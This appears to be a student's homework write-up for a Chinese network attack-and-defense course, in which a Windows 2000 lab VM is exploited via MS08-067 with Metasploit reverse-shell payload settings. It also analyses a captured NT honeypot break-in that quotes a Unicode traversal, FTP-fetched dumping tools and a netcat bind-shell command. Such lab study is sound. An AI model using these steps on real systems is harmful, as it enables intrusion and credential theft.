当前位置: 首页 > news >正文

20252821 2025-2026-2 《网络攻防实践》第6周作业

20252821 2025-2026-2 《网络攻防实践》第6周作业

20252821 2025-2026-2 《网络攻防实践》第6周作业

1.实践内容

(1)动手实践Metasploit windows attacker:使用metasploit软件进行windows远程渗透统计实验
(2)取证分析实践:解码一次成功的NT系统破解攻击,并分析攻击的全部过程
(3)团队对抗实践:windows系统远程渗透攻击和分析

  • 攻方使用metasploit选择漏洞进行攻击
  • 防守方使用wireshark监听获得的网络数据包

2.实践过程

2.1 动手实践Metasploit windows attacker

打开靶机win2k和攻击机kali,查看到靶机ip地址为192.168.200.124,攻击机ip地址为192.168.200.3
image
image

测试连通性,可以ping通
image

在kali中输入指令msfconsole
image

输入指令search ms08_067查看漏洞信息
image

输入指令exploit/windows/smb/ms08_067_netapi,然后指入命令show payloads
image
image

输入指令show options
image

输入指令

点击查看代码
`set payload generic/shell_reverse_tcp`  //设置攻击的载荷为tcp的反向连接
`set RHOST 192.168.200.124`  //设置渗透攻击的靶机Win2k
`set LHOST 192.168.200.3`  //设置渗透攻击的主机是kali

image

输入指令show options查看当前信息
image

输入指令exploit开始渗透攻击,成功渗透到靶机win2k,输入指令ipconfig查看靶机的网络信息成功
image

2.2 取证分析实践:解码一次成功的NT系统破解攻击。

导入文件进入kali虚拟机
image

使用wireshark打开该文件
image

使用过滤条件ip.addr == 172.16.1.106 and http过滤
image

找到第117行数据,特殊字符串%C0%AF是/的unicode编码,由此判断攻击者进行了unicode攻击并打开了boot.in文件
image

使用过滤条件tcp.stream eq 11过滤
继续追踪tcp流发现在146号包中有shell语句和"ADM!ROX!YOUR!WORLD"!,判断为RDS漏洞攻击
image

这里表明攻击者利用ftp下载了nc.exe,pdump.exe,samdump.dll这三个文件
image

打开1233号包,追踪TCP数据流看到cmd1.exe /c nc -l -p 6969 -e cmd1.exe,这表明攻击者连接了6969端口
image

输入过滤条件tcp.port == 6969,追踪数据流可以发现攻击机试图进入靶机但是失败
image

这里表明攻击者删除了之前通过ftp下载的文件
image

这里表明攻击者发现了靶机是一台蜜罐主机,并表示echo best honeypot
image

2.3 团队对抗实践:windows系统远程渗透攻击和分析

攻击机kali ip地址:192.168.151.98(刘铭洋)
靶机Win2k ip地址: 192.168.151.65 (叶姜祺)

输入指令

点击查看代码
`set payload windows/shell_reverse_tcp`  //设置攻击的载荷为tcp的反向连接
`set RHOST 192.168.151.65`  //设置渗透攻击的靶机Win2k
`set LHOST 192.168.151.98`  //设置渗透攻击的主机是kali

image

image

在Win2Kserver 虚拟机(192.168.200.4)中的对应路径下可以找到新建立的文件夹
image

image

追踪tcp流
image

3.学习中遇到的问题及解决

(1)问题:第一个环节kali虚拟机和win2k虚拟机ping不通

发现是win2k无法联网
解决:将win2k虚拟机进行配置,将网络改成Vmnet8

(2)问题:kali虚拟机内浏览器无法登陆学习通,下载不了软件

解决:非常简单的方法,直接在本机下载好,复制粘贴

4.学习感想和体会

本次实验让我切实体会到,渗透测试中“环境可达”往往是比漏洞利用更耗时的环节。按照实验指导,我先后配置了Windows 2000靶机与Kali攻击机,但两台虚拟机接连出现网络不通的问题。Windows 2000无法获取IP,经排查是虚拟网卡驱动不兼容,将网卡类型改为PCnet-FAST III后解决。随后Kali虽然可以ping通外网,浏览器却无法访问网页,apt更新也失败,最后发现是系统代理被错误指向了不存在的代理服务器,关闭代理后才恢复正常。

这些看似基础的网络配置问题,在实战中会直接阻断后续攻击流程。MS08-067的漏洞利用命令本身并不复杂,但若没有扎实的网络排错能力,连攻击入口都无法建立。这次经历让我认识到,学习渗透测试不能只关注漏洞原理和攻击载荷,更要重视网络协议、虚拟化环境配置等底层技能。只有把环境调试清楚,后续的渗透与取证分析才有真正的实践价值。